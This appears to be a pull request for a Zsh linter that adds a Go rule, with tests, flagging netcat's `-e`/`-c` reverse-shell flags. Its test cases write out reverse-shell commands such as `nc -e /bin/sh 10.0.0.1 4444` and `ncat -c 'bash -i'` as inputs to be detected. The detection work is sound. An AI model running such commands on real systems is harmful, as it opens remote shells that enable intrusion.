### PR TITLE
feat: ZC1489 — error on nc -e / ncat -e (reverse-shell flag)

### DIFF
--- a/pkg/katas/katatests/zc1489_test.go
+++ b/pkg/katas/katatests/zc1489_test.go
@@ -1,0 +1,70 @@
+package katas
+
+import (
+	"testing"
+
+	"github.com/afadesigns/zshellcheck/pkg/katas"
+	"github.com/afadesigns/zshellcheck/pkg/testutil"
+)
+
+func TestZC1489(t *testing.T) {
+	tests := []struct {
+		name     string
+		input    string
+		expected []katas.Violation
+	}{
+		{
+			name:     "valid — nc -l 4444",
+			input:    `nc -l 4444`,
+			expected: []katas.Violation{},
+		},
+		{
+			name:     "valid — nc host 443",
+			input:    `nc example.com 443`,
+			expected: []katas.Violation{},
+		},
+		{
+			name:  "invalid — nc -e /bin/sh",
+			input: `nc -e /bin/sh 10.0.0.1 4444`,
+			expected: []katas.Violation{
+				{
+					KataID:  "ZC1489",
+					Message: "`nc -e` is the classic reverse-shell flag. Use socat with explicit PTY + authorization instead.",
+					Line:    1,
+					Column:  1,
+				},
+			},
+		},
+		{
+			name:  "invalid — ncat -e /bin/bash",
+			input: `ncat -e /bin/bash 10.0.0.1 4444`,
+			expected: []katas.Violation{
+				{
+					KataID:  "ZC1489",
+					Message: "`ncat -e` is the classic reverse-shell flag. Use socat with explicit PTY + authorization instead.",
+					Line:    1,
+					Column:  1,
+				},
+			},
+		},
+		{
+			name:  "invalid — ncat -c 'bash -i'",
+			input: `ncat -c 'bash -i' 10.0.0.1 4444`,
+			expected: []katas.Violation{
+				{
+					KataID:  "ZC1489",
+					Message: "`ncat -c` is the classic reverse-shell flag. Use socat with explicit PTY + authorization instead.",
+					Line:    1,
+					Column:  1,
+				},
+			},
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			violations := testutil.Check(tt.input, "ZC1489")
+			testutil.AssertViolations(t, tt.input, violations, tt.expected)
+		})
+	}
+}

--- a/pkg/katas/zc1489.go
+++ b/pkg/katas/zc1489.go
@@ -1,0 +1,50 @@
+package katas
+
+import (
+	"github.com/afadesigns/zshellcheck/pkg/ast"
+)
+
+func init() {
+	RegisterKata(ast.SimpleCommandNode, Kata{
+		ID:       "ZC1489",
+		Title:    "Error on `nc -e` / `ncat -e` — classic reverse-shell invocation",
+		Severity: SeverityError,
+		Description: "`nc -e <shell>` and `ncat -e <shell>` pipe a shell to a network socket. " +
+			"This is the canonical reverse-shell payload. Most distro builds of `nc` have " +
+			"`-e` disabled for precisely this reason, so seeing it in a script is either an " +
+			"attacker backdoor or a deployment time bomb waiting on a different packaging " +
+			"of netcat. If you need a bidirectional pipe, use `socat TCP:... EXEC:...,pty` " +
+			"with an explicit authorization check and document the use.",
+		Check: checkZC1489,
+	})
+}
+
+func checkZC1489(node ast.Node) []Violation {
+	cmd, ok := node.(*ast.SimpleCommand)
+	if !ok {
+		return nil
+	}
+
+	ident, ok := cmd.Name.(*ast.Identifier)
+	if !ok {
+		return nil
+	}
+	if ident.Value != "nc" && ident.Value != "ncat" && ident.Value != "netcat" {
+		return nil
+	}
+
+	for _, arg := range cmd.Arguments {
+		v := arg.String()
+		if v == "-e" || v == "-c" {
+			return []Violation{{
+				KataID: "ZC1489",
+				Message: "`" + ident.Value + " " + v + "` is the classic reverse-shell flag. " +
+					"Use socat with explicit PTY + authorization instead.",
+				Line:   cmd.Token.Line,
+				Column: cmd.Token.Column,
+				Level:  SeverityError,
+			}}
+		}
+	}
+	return nil
+}

--- a/pkg/version/version.go
+++ b/pkg/version/version.go
@@ -2,5 +2,5 @@ package version
 
 // Version is the current version of ZShellCheck.
 // It is calculated based on the number of implemented Katas.
-// 485 Katas = 0.4.85
-const Version = "0.4.85"
+// 486 Katas = 0.4.86
+const Version = "0.4.86"


### PR DESCRIPTION
## Summary
- Flags `nc|ncat|netcat -e` and `ncat -c` — pipes a shell to a network socket (canonical reverse-shell payload)
- Severity: Error
- Suggest `socat` with explicit PTY + authorization

## Test plan
- [x] `go test ./...`
- [x] `golangci-lint run ./...`
- [x] Version bumped to 0.4.86 (486 katas)